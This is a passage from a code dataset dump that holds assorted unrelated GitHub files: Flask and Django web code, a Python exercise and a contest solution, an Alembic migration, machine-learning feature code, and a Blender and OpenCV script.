\"\n \"/api/v1.0/start/end\"\n )\n@app.route(\"/api/v1.0/precipitation\")\ndef precip():\n precipitation = session.query(Measurement.date, Measurement.prcp).all()\n precip = {date: prcp for date, prcp in precipitation}\n return jsonify(precip)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n stations = session.query(Station.station).all()\n stations_list = list(np.ravel(stations))\n return jsonify(stations_list)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n temp = session.query(Measurement.date, Measurement.tobs).filter(Measurement.station == \"USC00519281\").all()\n temps = list(np.ravel(temp))\n return jsonify(temps)\n \n@app.route(\"/api/v1.0/\")\n@app.route(\"/api/v1.0//\")\ndef start_end(start = None, end = None):\n values = [func.min(Measurement.tobs), func.max(Measurement.tobs), func.avg(Measurement.tobs)]\n if not end:\n results = session.query(*values).filter(Measurement.date >= start).all()\n start_temp = list(np.ravel(results))\n return jsonify(start_temp)\n \n \n results = session.query(*values).filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n start_temp = list(np.ravel(results))\n return jsonify(start_temp)\n\nif __name__ == \"__main__\":\n app.run(debug=True) ","repo_name":"J-Schea29/sqlalchemy-challenge","sub_path":"Api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41560751825","text":"import json\nfrom flask import Blueprint, render_template\nfrom database import db\n\ntest_page = Blueprint('test_page', __name__, template_folder='templates')\n\n@test_page.route('/test-mysql-dump', methods=['GET'])\ndef test_mysql_dump():\n with db.cursor() as cursor, open(\"sql/fetch_all_postal_codes_info.sql\", \"r\") as sql:\n cursor.execute(sql.read())\n data = cursor.fetchall()\n\n return render_template(\"test.html\", data=data)\n\n__all__ = [\"test_page\"]","repo_name":"kirti1211c/dbms","sub_path":"routes/test_page.py","file_name":"test_page.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29458188841","text":"# Exercise 1: Initial function, call with passed argument\nimport turtle\nbob = turtle.Turtle()\n\ndef square(t):\n \"\"\"Draws square iteratively, returns to origin\"\"\"\n for i in range(4):\n t.fd(200); t.lt(90)\n\nsquare(bob)\nturtle.resetscreen()\n\n# Exercise 2: Length added as parameter to square()\ndef square2(t, l):\n \"\"\"Draws square iteratively with length parameter, returns to origin\"\"\"\n for i in range(4):\n t.fd(l); t.lt(90)\n\nsquare2(bob,250)\nturtle.resetscreen()\n\n# Exercises 3-5 are examples of refactoring code\n\n# Exercise 3: Polygon\ndef polyline(t, n, l, ang):\n \"\"\"Text-given function to draw polygon shapes\"\"\"\n for i in range(n):\n t.fd(l); t.lt(ang)\n\ndef polygon(t,l,n):\n \"\"\"Draws n-sided polygon\"\"\"\n ang = 360.0 / n # \"360.0\" sets as float, avoids error codes\n polyline(t, n, l, ang)\n\npolygon(bob,l=200, n=3)\nturtle.resetscreen()\n\n# Exercise 4: Circle as polygon\nimport math\n\ndef circle(t, r):\n \"\"\"Draws circle by calling polygon()\"\"\"\n c = 2 * r * math.pi\n n = int(c / 3) + 3 # Instead of constant, define number of sides by circumference where +3 ensures n >= 3\n l = c / n\n polygon(t, l, n)\n\ndef circle2(t, r):\n \"\"\"Text-given alternate with refactoring\"\"\"\n arc(t, r, 360)\n\ncircle(bob, 50)\nturtle.resetscreen()\ncircle(bob, 
100)\nturtle.resetscreen()\n\n# Exercise 5: Circle arc\ndef arc(t, r, ang):\n \"\"\"Draws complete circle if 360 degrees, partial otherwise\"\"\"\n arc_c = 2 * math.pi * r * ang / 360\n n = int(arc_c / 3) + 1\n a_l = arc_c / n\n a_ang = ang / n\n polyline(t, n, a_l, a_ang) # Rewritten with text-provided polyline.\n\narc(bob, 50, 180)\nturtle.mainloop()","repo_name":"mencohr/Computer-Science","sub_path":"Think Python/Chapter 4: Case study: interface design/Notes: Case study: Interface design/Note: Chapter 4.3-7: Exercises.py","file_name":"Note: Chapter 4.3-7: Exercises.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23148871972","text":"import sys\nfrom collections import deque\nimport copy\ndef main():\n N, M = map(int, input().split())\n H = [int(i) for i in input().split()]\n dp = [[] for i in range(N)]\n color = [0 for i in range(N)]\n for i in range(M):\n a, b = map(int, input().split())\n a -= 1\n b -= 1\n dp[a].append(b)\n dp[b].append(a)\n count = 0 \n for i in range(N):\n if color[i] == 1:\n continue\n flag = True\n for j in range(len(dp[i])):\n if H[i] <= H[dp[i][j]]:\n flag = False\n break\n else:\n color[dp[i][j]] = 1\n if flag:\n count += 1\n print(count)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Tomoki-Kikuta/atcoder","sub_path":"abc166/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15321585168","text":"\"\"\"update user table\n\nRevision ID: 0a909e2b59a1\nRevises: 0b026dea7cc6\nCreate Date: 2019-11-25 10:15:20.875486\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0a909e2b59a1'\ndown_revision = '0b026dea7cc6'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('usertable', sa.Column('site', sa.String(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('usertable', 'site')\n # ### end Alembic commands ###\n","repo_name":"petermirithu/Pitch_web_App","sub_path":"migrations/versions/0a909e2b59a1_update_user_table.py","file_name":"0a909e2b59a1_update_user_table.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2572257666","text":"\"\"\"9. 
Среди натуральных чисел, которые были введены, найти наибольшее по сумме цифр.\r\nВывести на экран это число и сумму его цифр.\"\"\"\r\n\r\n\r\nn = int(input('Введите значение (для завершения сравнения введите 0): '))\r\nmax_s = 0\r\nmax_m = 0\r\nwhile n != 0:\r\n m = n\r\n s = 0\r\n while n > 0:\r\n s += n % 10\r\n n //= 10\r\n if s > max_s:\r\n max_s = s\r\n max_m = m\r\n n = int(input('Введите значение (для завершения сравнения введите 0): '))\r\nprint('Число', max_m,'имеет наибольшую сумму цифр:', max_s)","repo_name":"SunshinePuff/Python_1","sub_path":"Lesson_2_9.py","file_name":"Lesson_2_9.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17660830749","text":"from machine import Pin, SoftI2C\nfrom lib.config import *\nfrom lib.oled.ssd1306 import SSD1306_I2C\nimport urequests\nimport json\n\n# Oled Display\ni2c = SoftI2C(sda=Pin(DEFAULT_IOTKIT_I2C_SDA), scl=Pin(DEFAULT_IOTKIT_I2C_SCL))\ndisplay = SSD1306_I2C(128, 64, i2c)\n\n###\n# Verbindung zum Cloud Dienst\n#\nreq = urequests.request(method='GET', url='http://api.sunrise-sunset.org/json?lat=47.3686498&lng=8.5391825')\n\n# Umwandlung nach JSON\nrc = req.text\ndata = json.loads( rc )\nresults = data['results']\nsr = str(results['sunrise'])\nss = str(results['sunset'])\n\ndisplay.text(\"Sunset \" + sr, 0, 0)\ndisplay.text(\"Sunrise \" + ss, 0, 8)\ndisplay.show()\n\nprint( sr, ss )","repo_name":"mc-b/iotkitmp","sub_path":"http/sunrise-sunset.py","file_name":"sunrise-sunset.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23632482741","text":"from .registry import MODELS\nfrom .stacked_hg import HourglassNet, Bottleneck2D\nfrom .refinenet_deformable import RefineNetDeform\nfrom .multi_task_head import MultitaskHead\n\n@MODELS.register(\"Hourglass\")\ndef build_hg(cfg):\n inplanes = cfg.MODEL.HGNETS.INPLANES\n num_feats = cfg.MODEL.OUT_FEATURE_CHANNELS//2\n depth = cfg.MODEL.HGNETS.DEPTH\n num_stacks = cfg.MODEL.HGNETS.NUM_STACKS\n num_blocks = cfg.MODEL.HGNETS.NUM_BLOCKS\n head_size = cfg.MODEL.HEAD_SIZE\n\n out_feature_channels = cfg.MODEL.OUT_FEATURE_CHANNELS\n\n\n num_class = sum(sum(head_size, []))\n model = HourglassNet(\n block=Bottleneck2D,\n inplanes = inplanes,\n num_feats= num_feats,\n depth=depth,\n head=lambda c_in, c_out: MultitaskHead(c_in, c_out, head_size=head_size),\n num_stacks = num_stacks,\n num_blocks = num_blocks,\n num_classes = num_class)\n\n model.out_feature_channels = out_feature_channels\n\n return model\n\n@MODELS.register(\"Refinenet\")\ndef build_rf(cfg):\n model = RefineNetDeform(\n 2, \n cuda=cfg.MODEL.CUDA, \n attn=cfg.MODEL.ATTN, \n attn_only=cfg.MODEL.ATTN_ONLY, \n attn_dim=cfg.MODEL.ATTN_DIM, \n n_head=cfg.MODEL.ATTN_N_HEAD, \n use_contrastive=cfg.MODEL.ATTN_USE_CTL,\n share_weights=cfg.MODEL.ATTN_SHARE_W, \n attn_bottleneck=cfg.MODEL.ATTN_BN, \n resoff=cfg.MODEL.RES_OFF, \n feature_dept=cfg.MODEL.RES_OFF_DEPT, \n tao=cfg.MODEL.CTL_TAO\n )\n model.out_feature_channels = 2\n return model\n\ndef build_backbone(cfg, type=None):\n assert cfg.MODEL.NAME in MODELS, \\\n \"cfg.MODELS.NAME: {} is not registered in registry\".format(cfg.MODELS.NAME)\n if type is None:\n return MODELS[cfg.MODEL.NAME](cfg)\n elif type == 'Refinenet':\n return MODELS[\"Refinenet\"](cfg)\n else:\n return 
MODELS[\"Hourglass\"](cfg)\n","repo_name":"c6wangya/hawp","sub_path":"parsing/backbones/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"13203121398","text":"import sys\nimport datetime as dt\nimport numpy as np\nimport pandas as pd\nimport skops.io as sio\n\n\ndef cal_features_and_return_one_day(m01: pd.DataFrame,\n instrument: str, contract: str, contract_multiplier: int,\n pre_settle: float, pre_spot_close: float,\n sub_win_width: int = 30, tot_bar_num: int = 240,\n amount_scale: float = 1e4, ret_scale: int = 100) -> pd.DataFrame:\n # basic price\n prev_day_close = m01[\"preclose\"].iloc[0]\n this_day_open = m01[\"daily_open\"].iloc[0]\n\n # aggregate variables\n agg_vars = [\"open\", \"high\", \"low\", \"close\", \"volume\", \"amount\"]\n agg_methods = {\n \"open\": \"first\",\n \"high\": max,\n \"low\": min,\n \"close\": \"last\",\n \"volume\": np.sum,\n \"amount\": np.sum,\n }\n dropna_cols = [\"open\", \"high\", \"low\", \"close\"]\n\n # intermediary variables\n m01[\"datetime\"] = m01[\"timestamp\"].map(dt.datetime.fromtimestamp)\n m01[\"vwap\"] = (m01[\"amount\"] / m01[\"volume\"] / contract_multiplier * amount_scale).fillna(method=\"ffill\")\n m01[\"vwap_cum\"] = (m01[\"amount\"].cumsum() / m01[\"volume\"].cumsum() / contract_multiplier * amount_scale).fillna(method=\"ffill\")\n m01[\"m01_return\"] = (m01[\"vwap\"] / m01[\"vwap\"].shift(1).fillna(pre_settle) - 1) * ret_scale\n m01[\"m01_return_cls\"] = (m01[\"close\"] / m01[\"close\"].shift(1).fillna(prev_day_close) - 1) * ret_scale\n m01[\"smart_idx\"] = m01[\"m01_return_cls\"].abs() / np.sqrt(m01[\"volume\"])\n m01[\"amplitude\"] = (m01[\"high\"] / m01[\"low\"] - 1) * ret_scale\n\n # agg to 5,10,15 minutes\n m05 = m01.set_index(\"datetime\")[agg_vars].resample(\"5T\").aggregate(agg_methods).dropna(axis=0, how=\"all\", subset=dropna_cols)\n m10 = m01.set_index(\"datetime\")[agg_vars].resample(\"10T\").aggregate(agg_methods).dropna(axis=0, how=\"all\", subset=dropna_cols)\n m15 = m01.set_index(\"datetime\")[agg_vars].resample(\"15T\").aggregate(agg_methods).dropna(axis=0, how=\"all\", subset=dropna_cols)\n for m_agg, m_agg_width in zip((m05, m10, m15), (5, 10, 15)):\n if len(m_agg) != tot_bar_num / m_agg_width:\n print(\"... data length is wrong! Length of M{:02d} is {} != {}\".format(\n m_agg_width, len(m_agg), tot_bar_num / m_agg_width))\n print(\"... contract = {}\".format(contract))\n print(\"... 
this program will terminate at once, please check again\")\n sys.exit()\n\n # initial results\n res = {\n \"instrument\": instrument,\n \"contract\": contract,\n \"tid\": {}, \"timestamp\": {},\n\n \"basis\": (pre_settle / pre_spot_close - 1) * ret_scale,\n \"csr\": (prev_day_close / pre_settle - 1) * ret_scale, # close and settle return\n \"onr\": (this_day_open / prev_day_close - 1) * ret_scale, # overnight return\n \"vwap_ret\": {}, \"vwap_cum_ret\": {}, \"hgh_ret\": {}, \"low_ret\": {}, # prices return\n \"vtop01_ret\": {}, \"vtop02_ret\": {}, \"vtop05_ret\": {}, # #top #diff #return\n \"vtop01_cvp\": {}, \"vtop02_cvp\": {}, \"vtop05_cvp\": {}, # corr(vwap, volume)\n \"vtop01_cvr\": {}, \"vtop02_cvr\": {}, \"vtop05_cvr\": {}, # corr(m01_return, volume)\n \"cvp\": {}, \"cvr\": {},\n \"up\": {}, \"dn\": {}, # chart\n \"skewness\": {}, # skewness\n \"smart01\": {}, \"smart01_ret\": {},\n \"smart02\": {}, \"smart02_ret\": {},\n \"smart05\": {}, \"smart05_ret\": {},\n \"vh01\": {}, \"vl01\": {}, \"vd01\": {},\n \"vh02\": {}, \"vl02\": {}, \"vd02\": {},\n \"vh05\": {}, \"vl05\": {}, \"vd05\": {},\n \"exr\": {}, \"exrb01\": {},\n \"gu\": {}, \"gd\": {}, \"g_tau\": {}, \"g_tau_abs\": {},\n \"mtm_vol_adj\": {},\n\n \"rtm\": {},\n }\n\n # core loop\n sub_win_num = int(tot_bar_num / sub_win_width)\n this_day_end_vwap = m01[\"vwap\"].iloc[-1]\n for t in range(1, sub_win_num):\n bar_num_before_t = t * sub_win_width\n norm_scale = np.sqrt(bar_num_before_t)\n m01_before_t = m01.iloc[0:bar_num_before_t, :]\n top01_bars = int(0.1 * bar_num_before_t)\n top02_bars = int(0.2 * bar_num_before_t)\n top05_bars = int(0.5 * bar_num_before_t)\n next_vwap, ts = m01.at[bar_num_before_t, \"vwap\"], m01.at[bar_num_before_t, \"timestamp\"]\n\n res[\"tid\"][t], res[\"timestamp\"][t] = \"T{:02d}\".format(t), ts\n\n # --- --- --- --- ---\n # --- return to mature\n res[\"rtm\"][t] = (this_day_end_vwap / next_vwap - 1) * ret_scale\n\n # --- --- --- --- ---\n # --- new alphas\n # kyzq: smart money\n sorted_by_smart_idx = m01_before_t[[\"vwap\", \"vwap_cum\", \"volume\", \"amount\", \"smart_idx\", \"m01_return_cls\"]].sort_values(by=\"smart_idx\", ascending=False)\n for threshold_prop in [0.1, 0.2, 0.5]:\n _id = \"{:02d}\".format(int(10 * threshold_prop))\n volume_threshold = sorted_by_smart_idx[\"volume\"].sum() * threshold_prop\n n = sum(sorted_by_smart_idx[\"volume\"].cumsum() < volume_threshold) + 1\n smart_df = sorted_by_smart_idx.head(n)\n smart_vwap = smart_df[\"vwap\"] @ smart_df[\"amount\"] / smart_df[\"amount\"].sum()\n smart_ret = smart_df[\"m01_return_cls\"] @ smart_df[\"amount\"] / smart_df[\"amount\"].sum()\n res[\"smart\" + _id][t] = (smart_vwap / m01_before_t[\"vwap_cum\"].iloc[-1] - 1) * ret_scale\n res[\"smart\" + _id + \"_ret\"][t] = smart_ret\n\n # kyzq: amplitude\n sorted_amplitude_by_vwap = m01_before_t[[\"amplitude\", \"vwap\"]].sort_values(by=\"vwap\", ascending=False)\n for threshold_prop, top_bars in zip([0.1, 0.2, 0.5], [top01_bars, top02_bars, top05_bars]):\n _id = \"{:02d}\".format(int(10 * threshold_prop))\n res[\"vh\" + _id][t] = sorted_amplitude_by_vwap[\"amplitude\"].head(top_bars).mean()\n res[\"vl\" + _id][t] = sorted_amplitude_by_vwap[\"amplitude\"].tail(top_bars).mean()\n res[\"vd\" + _id][t] = res[\"vh\" + _id][t] - res[\"vl\" + _id][t]\n\n # kyzq: extremely return\n ret_min, ret_max, ret_median = m01_before_t[\"m01_return_cls\"].min(), m01_before_t[\"m01_return_cls\"].max(), m01_before_t[\"m01_return_cls\"].median()\n res[\"exr\"][t] = ret_max if (ret_max + ret_min) > (2 * ret_median) 
else ret_min\n idx_exr = m01_before_t[\"m01_return_cls\"].index[m01_before_t[\"m01_return_cls\"] == res[\"exr\"][t]][0]\n res[\"exrb01\"][t] = m01_before_t[\"m01_return_cls\"].iloc[idx_exr - 1] if idx_exr >= 1 else np.nan\n\n # kyzq: time center weighted by return\n pos_idx = m01_before_t[\"m01_return_cls\"] > 0\n neg_idx = m01_before_t[\"m01_return_cls\"] < 0\n pos_grp = m01_before_t.loc[pos_idx, \"m01_return_cls\"]\n neg_grp = m01_before_t.loc[neg_idx, \"m01_return_cls\"]\n pos_wgt = pos_grp.abs() / pos_grp.abs().sum()\n neg_wgt = neg_grp.abs() / neg_grp.abs().sum()\n res[\"gu\"][t] = pos_grp.index @ pos_wgt\n res[\"gd\"][t] = neg_grp.index @ neg_wgt\n res[\"g_tau\"][t] = res[\"gu\"][t] - res[\"gd\"][t]\n res[\"g_tau_abs\"][t] = abs(res[\"g_tau\"][t])\n\n # huxo: momentum adjusted by volatility\n m01_ret_return_mean = m01_before_t[\"m01_return\"].mean()\n m01_ret_return_std = m01_before_t[\"m01_return\"].std()\n res[\"mtm_vol_adj\"][t] = m01_ret_return_mean / m01_ret_return_std\n\n # --- --- --- --- ---\n # --- old style alphas\n sorted_vwap_and_ret_by_volume = m01_before_t[[\"vwap\", \"m01_return\", \"volume\"]].sort_values(by=\"volume\", ascending=False)\n skewness = m01_before_t[\"m01_return\"].skew()\n corr_top_01 = sorted_vwap_and_ret_by_volume.head(top01_bars).corr(method=\"spearman\")\n corr_top_02 = sorted_vwap_and_ret_by_volume.head(top02_bars).corr(method=\"spearman\")\n corr_top_05 = sorted_vwap_and_ret_by_volume.head(top05_bars).corr(method=\"spearman\")\n\n res[\"vwap_ret\"][t] = (m01_before_t[\"vwap\"].iloc[-1] / this_day_open - 1) / norm_scale * ret_scale\n res[\"vwap_cum_ret\"][t] = (m01_before_t[\"vwap_cum\"].iloc[-1] / this_day_open - 1) / norm_scale * ret_scale\n res[\"hgh_ret\"][t] = (m01_before_t[\"daily_high\"].iloc[-1] / this_day_open - 1) / norm_scale * ret_scale\n res[\"low_ret\"][t] = (m01_before_t[\"daily_low\"].iloc[-1] / this_day_open - 1) / norm_scale * ret_scale\n\n res[\"vtop01_ret\"][t] = sorted_vwap_and_ret_by_volume[\"m01_return\"].head(top01_bars).mean()\n res[\"vtop02_ret\"][t] = sorted_vwap_and_ret_by_volume[\"m01_return\"].head(top02_bars).tail(top02_bars - top01_bars).mean()\n res[\"vtop05_ret\"][t] = sorted_vwap_and_ret_by_volume[\"m01_return\"].head(top05_bars).tail(top05_bars - top02_bars).mean()\n\n res[\"vtop01_cvp\"][t] = corr_top_01.at[\"vwap\", \"volume\"]\n res[\"vtop02_cvp\"][t] = corr_top_02.at[\"vwap\", \"volume\"]\n res[\"vtop05_cvp\"][t] = corr_top_05.at[\"vwap\", \"volume\"]\n\n res[\"vtop01_cvr\"][t] = corr_top_01.at[\"m01_return\", \"volume\"]\n res[\"vtop02_cvr\"][t] = corr_top_02.at[\"m01_return\", \"volume\"]\n res[\"vtop05_cvr\"][t] = corr_top_05.at[\"m01_return\", \"volume\"]\n\n res[\"cvp\"][t] = m01_before_t[[\"volume\", \"vwap\"]].corr(method=\"spearman\").at[\"vwap\", \"volume\"]\n res[\"cvr\"][t] = m01_before_t[[\"volume\", \"m01_return\"]].corr(method=\"spearman\").at[\"m01_return\", \"volume\"]\n\n if bar_num_before_t >= 15 * 3:\n res[\"up\"][t] = 1 if m15[\"low\"][0] < m15[\"low\"][1] < m15[\"low\"][2] else 0\n res[\"dn\"][t] = 1 if m15[\"high\"][0] > m15[\"high\"][1] > m15[\"high\"][2] else 0\n elif bar_num_before_t >= 10 * 3:\n res[\"up\"][t] = 1 if m10[\"low\"][0] < m10[\"low\"][1] < m10[\"low\"][2] else 0\n res[\"dn\"][t] = 1 if m10[\"high\"][0] > m10[\"high\"][1] > m10[\"high\"][2] else 0\n elif bar_num_before_t >= 5 * 3:\n res[\"up\"][t] = 1 if m05[\"low\"][0] < m05[\"low\"][1] < m05[\"low\"][2] else 0\n res[\"dn\"][t] = 1 if m05[\"high\"][0] > m05[\"high\"][1] > m05[\"high\"][2] else 0\n else:\n res[\"up\"][t] = 
0\n res[\"dn\"][t] = 0\n\n res[\"skewness\"][t] = skewness\n\n res_df = pd.DataFrame(res)\n return res_df\n\n\ndef save_to_sio_obj(t_sklearn_obj, t_path: str):\n obj = sio.dumps(t_sklearn_obj)\n with open(t_path, \"wb+\") as f:\n f.write(obj)\n return 0\n\n\ndef read_from_sio_obj(t_path: str):\n with open(t_path, \"rb\") as f:\n obj = f.read()\n return sio.loads(obj, trusted=True)\n","repo_name":"huxiaoou/Project_2023_06_EquityIndex_ML_V1","sub_path":"xfuns.py","file_name":"xfuns.py","file_ext":"py","file_size_in_byte":10271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15843824519","text":"\"\"\"\nBasic Object Operations Example\n+++++++++++++++++++++++++++++++\n\nThis script demonstrates basic operations on object like creating new\nobject, placing it into a view layer, selecting it and making it active.\n\"\"\"\n\nimport bpy\n\nview_layer = bpy.context.view_layer\n\n# Create new light datablock.\nlight_data = bpy.data.lights.new(name=\"New Light\", type='POINT')\n\n# Create new object with our light datablock.\nlight_object = bpy.data.objects.new(name=\"New Light\", object_data=light_data)\n\n# Link light object to the active collection of current view layer,\n# so that it'll appear in the current scene.\nview_layer.active_layer_collection.collection.objects.link(light_object)\n\n# Place light to a specified location.\nlight_object.location = (5.0, 5.0, 5.0)\n\n# And finally select it and make it active.\nlight_object.select_set(True)\nview_layer.objects.active = light_object\n","repo_name":"blender/blender","sub_path":"doc/python_api/examples/bpy.types.Object.py","file_name":"bpy.types.Object.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":10105,"dataset":"github-code","pt":"61"} +{"seq_id":"10903833202","text":"import cv2\nimport mediapipe as mp\n\ncarmera = cv2.VideoCapture(0)\nhand_Detector = mp.solutions.hands.Hands()\n\nwhile True:\n success, img = carmera.read()\n img = cv2.flip(img, 1)\n if success:\n #img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n results = hand_Detector.process(img)\n\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n mp.solutions.drawing_utils.draw_landmarks(img, hand_landmarks, mp.solutions.hands.HAND_CONNECTIONS)\n\n cv2.imshow(\"Hand Tracking\", img)\n\n quit = cv2.waitKey(1)\n\n if quit == ord('q'):\n break\n\ncarmera.release()\ncv2.destroyAllWindows()","repo_name":"holycabbage/Hand-tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"199040134","text":"from django.contrib import admin\r\nfrom django.contrib.admin import register\r\n\r\nfrom bbbs.afisha.filters import CitySelectFilter\r\nfrom bbbs.afisha.models import Event, EventParticipant\r\nfrom bbbs.common.models import City\r\nfrom bbbs.users.utils import AdminAndModersPermissionsMixin\r\n\r\n\r\nclass EventParticipantInline(\r\n AdminAndModersPermissionsMixin, admin.TabularInline\r\n):\r\n model = EventParticipant\r\n extra = 0\r\n verbose_name_plural = \"Список участников\"\r\n\r\n def get_readonly_fields(self, request, obj=None):\r\n if obj:\r\n if request.user.profile.is_moderator_reg:\r\n return [\"user\"]\r\n return super().get_readonly_fields(request, obj)\r\n\r\n def has_add_permission(self, request, obj=None):\r\n if request.user.profile.is_moderator_reg:\r\n return False\r\n return 
super().has_add_permission(request, obj)\r\n\r\n\r\n@register(Event)\r\nclass EventAdmin(AdminAndModersPermissionsMixin, admin.ModelAdmin):\r\n inlines = [\r\n EventParticipantInline,\r\n ]\r\n list_display = (\r\n \"id\",\r\n \"city\",\r\n \"address\",\r\n \"contact\",\r\n \"title\",\r\n \"description\",\r\n \"start_at\",\r\n \"end_at\",\r\n \"seats\",\r\n )\r\n list_filter = (\r\n CitySelectFilter,\r\n \"start_at\",\r\n )\r\n empty_value_display = \"-пусто-\"\r\n search_fields = (\"title\",)\r\n\r\n def get_queryset(self, request):\r\n if request.user.profile.is_moderator_reg:\r\n return Event.objects.filter(\r\n city__in=City.objects.filter(region=request.user.profile)\r\n )\r\n\r\n else:\r\n return Event.objects.all()\r\n\r\n def get_form(self, request, obj=None, **kwargs):\r\n form = super().get_form(request, obj, **kwargs)\r\n if request.user.profile.is_moderator_reg:\r\n form.base_fields[\"city\"].queryset = request.user.profile.region\r\n form.base_fields[\r\n \"start_at\"\r\n ].help_text = \"Время и дата указываются в формате местного времени\"\r\n form.base_fields[\r\n \"end_at\"\r\n ].help_text = \"Время и дата указываются в формате местного времени\"\r\n return form\r\n\r\n\r\n@register(EventParticipant)\r\nclass EventParticipantAdmin(AdminAndModersPermissionsMixin, admin.ModelAdmin):\r\n list_display = (\"user\", \"event\")\r\n\r\n empty_value_display = \"-пусто-\"\r\n list_select_related = (\r\n \"user\",\r\n \"event\",\r\n )\r\n","repo_name":"ivartm/bbbs","sub_path":"bbbs/afisha/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13873902549","text":"# itertools 잘 쓸수 있는지?\n# combination 중복x조합\n# permutation 중복조합\n# product 2개이상 모든 조합\nimport sys\nfrom itertools import combinations\n\nwhile True:\n arr = list(map(int, sys.stdin.readline().split()))\n if arr[0] == 0:\n break\n n = arr[0]\n arr.pop(0)\n\n l = list(combinations(arr, 6))\n\n for i in l:\n for j in i:\n print(j, end=' ')\n print()\n print()\n\n\n","repo_name":"whiskey21/my-algorithm-book","sub_path":"홍익_자주동/3주차/로또.py","file_name":"로또.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33744173966","text":"from sqlalchemy import select\nfrom simta.classes import Error\nfrom simta import db, util, models\nimport os\nfrom flask import send_from_directory\nfrom sqlalchemy.sql import functions as funcs\n\nallowed_fields = {\n \"id\", \"sidang_id\", \"penguji_id\", \"nomor\", \"status\", \"created_at\", \"updated_at\", \"file_name\", \"detail\"\n}\nallowed_fields_penolakan = {\n \"file_name\", \"detail\"\n}\nallowed_filters = {\"status\"}\nenums = [\"status\"]\nstrs = [\"created_at\", \"updated_at\"]\n\nDEFAULT_SIDANG = True\nDEFAULT_PENGUJI = False\nDEFAULT_PENOLAKAN = True\nDEFAULT_PEMBIMBING = False\nDEFAULT_TA = True\nDEFAULT_MHS = True\nDEFAULT_REVISI_TERAKHIR = False\n\nWORKDIR = os.getenv(\"WORKDIR\", \"simta\")\nDIR_FILE_PENOLAKAN = os.path.abspath(f\"{WORKDIR}/assets/files/penolakan_revisi\")\nDIR_FILE_REVISI = os.path.abspath(f\"{WORKDIR}/assets/files/revisi\")\n\ndef apply_filters(stmt, **kwargs):\n return util.apply_filters(stmt, allowed_filters, kwargs)\n\n\ndef postprocess(revisi, sidang=DEFAULT_SIDANG, penguji=DEFAULT_PENGUJI, penolakan=DEFAULT_PENOLAKAN, ta=DEFAULT_TA, pembimbing=DEFAULT_PEMBIMBING, mhs=DEFAULT_MHS, revisi_terakhir=DEFAULT_REVISI_TERAKHIR, **kwargs):\n if 
penolakan:\n penolakan = revisi.penolakan\n #penolakan = penolakan[0] if penolakan else None\n if sidang:\n sidang = revisi.penguji.sidang\n\n revisi = util.filter_obj_dict(revisi, allowed_fields)\n util.resolve_enums(revisi, enums)\n util.resolve_strs(revisi, strs)\n\n if sidang:\n sidang = models.Sidang.postprocess(\n sidang, \n pembimbing=pembimbing, \n penguji=penguji, \n ta=ta,\n mhs=mhs, \n revisi_terakhir=revisi_terakhir,\n **kwargs\n )\n revisi[\"sidang\"] = sidang\n if penolakan:\n penolakan = util.filter_obj_dict(penolakan, allowed_fields_penolakan)\n revisi[\"penolakan\"] = penolakan\n\n return revisi\n\ndef _get(session, revisi_id, user_id):\n stmt = select(db.Revisi)\n stmt = stmt.filter_by(id=revisi_id)\n\n revisi = session.scalars(stmt).first()\n\n if not revisi:\n raise Error(\"Revisi not found\", 404)\n\n if revisi.penguji.id != user_id and revisi.penguji.sidang.ta.mhs.id != user_id:\n raise Error(\"Anda tidak berhak mengakses revisi ini\", 401)\n\n return revisi\n\n\ndef get(revisi_id, user_id, sidang=DEFAULT_SIDANG, penguji=DEFAULT_PENGUJI, penolakan=DEFAULT_PENOLAKAN, ta=DEFAULT_TA, pembimbing=DEFAULT_PEMBIMBING, mhs=DEFAULT_MHS, revisi_terakhir=DEFAULT_REVISI_TERAKHIR, **kwargs):\n with db.Session() as session:\n revisi = _get(session, revisi_id, user_id)\n\n revisi = postprocess(\n revisi, \n sidang=sidang,\n penguji=penguji,\n penolakan=penolakan,\n pembimbing=pembimbing,\n ta=ta,\n mhs=mhs,\n revisi_terakhir=revisi_terakhir,\n **kwargs\n )\n return 